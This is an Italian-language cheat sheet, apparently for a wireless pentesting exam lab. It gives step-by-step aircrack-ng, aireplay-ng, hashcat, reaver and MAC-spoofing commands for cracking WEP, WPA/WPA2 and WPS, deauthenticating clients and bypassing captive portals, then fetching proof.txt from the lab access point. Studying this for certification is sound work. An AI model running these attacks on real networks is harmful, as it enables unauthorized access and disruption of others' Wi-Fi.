Vai al contenuto

17 Cheetsheat

Fase 0: Preparazione dell'Ambiente

Questa fase è cruciale e va eseguita all'inizio di ogni scenario per configurare correttamente la scheda di rete.

Bash
# 1. Identificare l'interfaccia wireless (es. wlan0)
iwconfig

# 2. Terminare i processi che potrebbero interferire (ESSENZIALE)
sudo airmon-ng check kill

# 3. Avviare la modalità monitor
sudo airmon-ng start wlan0
# L'interfaccia monitor sarà solitamente wlan0mon

# 4. Verificare che la modalità monitor sia attiva
iwconfig

Nota: Se necessario, riavviare il Network Manager per installare pacchetti:

Bash
sudo systemctl start NetworkManager


Fase 1: Ricognizione (Reconnaissance)

L'obiettivo è identificare le reti target, i loro client e le vulnerabilità.

Bash
# Scansione completa di tutte le reti (2.4 GHz e 5 GHz)
sudo airodump-ng --band abg --manufacturer wlan0mon
* --band abg: Include le reti a 5 GHz. * --manufacturer: Mostra il produttore dell'AP. * --wps: Mostra se il WPS è abilitato.

Durante l'attacco, blocca il canale sul target per non perdere pacchetti:

Bash
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w <capture_file> wlan0mon
* -c <CHANNEL>: Blocca la scansione su un canale specifico. * --bssid <BSSID>: Filtra il traffico per un AP specifico. * -w <capture_file>: Salva la cattura in un file (es. capture).


Fase 2: Attacchi Specifici

2.1 Attacco a Reti WEP

Le reti WEP sono vulnerabili a causa della debolezza del suo algoritmo di cifratura.

Procedura: 1. Identificare la rete WEP: Usare airodump-ng --encrypt WEP. 2. Catturare gli IV (Initialization Vectors):

Bash
# Avviare la cattura sul canale e BSSID target
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w wep_capture wlan0mon
3. Generare Traffico (se necessario): Se il traffico è scarso, iniettare pacchetti ARP per accelerare la raccolta di IV (fino a ~40.000 pacchetti). * Opzione A (Consigliata): Usare aireplay-ng in un'altra sessione terminale.
Bash
# --arpreplay attack (type 3)
sudo aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> wlan0mon
* Opzione B (Se non ci sono client associati): Eseguire un attacco di Fake Authentication.
Bash
# -1 0: Fake authentication attack
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> wlan0mon
Poi procedere con l'ARP replay attack (aireplay-ng -3). 4. Crackare la Chiave WEP: Una volta raccolti abbastanza IV (circa 40.000), usare aircrack-ng:
Bash
sudo aircrack-ng wep_capture-01.cap

2.2 Attacco a Reti WPA/WPA2-PSK

L'obiettivo è catturare l'handshake a 4 vie durante la connessione di un client.

Procedura: 1. Avviare la cattura sul canale e BSSID target:

Bash
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w wpa_capture wlan0mon
2. Forzare la riconnessione (Deauthentication Attack): In un'altra sessione terminale, inviare pacchetti di deautenticazione per disconnettere un client. * Attacco mirato (consigliato):
Bash
# -0 <num_pacchetti>: Deauthentication attack
sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon
* Attacco broadcast (rumoroso):
Bash
sudo aireplay-ng -0 5 -a <BSSID> wlan0mon
3. Verificare la Cattura: airodump-ng mostrerà "WPA handshake" in alto a destra quando l'handshake è stato catturato. 4. Crackare la Password con Hashcat: * Convertire il file .cap in formato .hccapx (o .22000):
Bash
# Usare hcxpcapngtool (successore di hcxpcaptool)
hcxpcapngtool -o hash_handshake.hc22000 wpa_capture-01.cap
* Eseguire Hashcat con la modalità 22000 e la wordlist rockyou.txt:
Bash
# -m 22000: Modalità per WPA/WPA2 PMKID e handshake
sudo hashcat -m 22000 hash_handshake.hc22000 /usr/share/wordlists/rockyou.txt
Nota: L'esame fornisce una macchina con risorse limitate. Assicurarsi di avere RAM sufficiente (es. 8 GB) per Hashcat.

2.3 Attacco WPS (Wi-Fi Protected Setup)

Il WPS è spesso vulnerabile a brute-force a causa della sua implementazione.

Bash
# 1. Identificare AP con WPS abilitato
sudo wash -i wlan0mon -s

# 2. Attacco brute-force con Reaver
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv
* Se il WPS si blocca dopo troppi tentativi, si può provare a inviare pacchetti malformati per riavviare l'interfaccia (tecniche come "Pixie Dust" possono essere usate con l'opzione -K di reaver).

2.4 Bypass del Captive Portal

Questa tecnica, discussa nella riunione, permette di aggirare il portale di autenticazione di una rete ospite.

Procedura: 1. Monitorare il traffico per identificare un client già autenticato sulla rete target:

Bash
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> wlan0mon
2. Annotare il MAC Address di un client associato (<CLIENT_MAC>). 3. Spoofare il MAC Address sulla propria interfaccia di rete (che deve essere in modalità gestita, non monitor). * Metodo 1 (Macchanger):
Bash
sudo systemctl stop network-manager
sudo ip link set wlan0 down
sudo macchanger -m <CLIENT_MAC> wlan0
sudo ip link set wlan0 up
sudo systemctl start network-manager
* Metodo 2 (Manuale):
Bash
sudo ip link set wlan0 down
sudo ip link set wlan0 address <CLIENT_MAC>
sudo ip link set wlan0 up
4. Connettersi alla rete: Il sistema sarà riconosciuto come il client legittimo e potrà accedere alla rete senza passare dal Captive Portal.


Fase 3: Accesso e Raccolta della Prova (Proof)

Dopo aver ottenuto la chiave WEP/WPA o aver bypassato il Captive Portal, l'obiettivo finale è connettersi alla rete e recuperare il file proof.txt.

  1. Connettersi alla Rete Target:
    • WPA/WPA2: Creare un file wpa_supplicant.conf con la chiave trovata o usare il gestore di rete grafico.
    • Rete Aperta/Bypass: Connettersi semplicemente alla rete.
  2. Accedere al Server Target: L'AP fornisce un server web all'indirizzo http://192.168.1.1.
  3. Recuperare la Prova:
    Bash
    # Usare curl o wget per scaricare il file
    curl http://192.168.1.1/proof.txt
    # oppure
    wget http://192.168.1.1/proof.txt
    
  4. Documentazione: È obbligatorio fare screenshot del processo e del proof.txt per il report finale.

Riepilogo dei Comandi Principali

Fase Comando
Setup sudo airmon-ng check kill
sudo airmon-ng start wlan0
Scansione sudo airodump-ng --band abg --manufacturer wlan0mon
Cattura Mirata sudo airodump-ng -c <CH> --bssid <BSSID> -w <file> wlan0mon
Deauth (WPA) sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon
Crack WEP sudo aircrack-ng <capture_file>.cap
Crack WPA (Hashcat) hcxpcapngtool -o hash.hc22000 <capture_file>.cap
sudo hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
Spoof MAC sudo ip link set wlan0 down && sudo ip link set wlan0 address <NEW_MAC> && sudo ip link set wlan0 up
Prova Finale curl http://192.168.1.1/proof.txt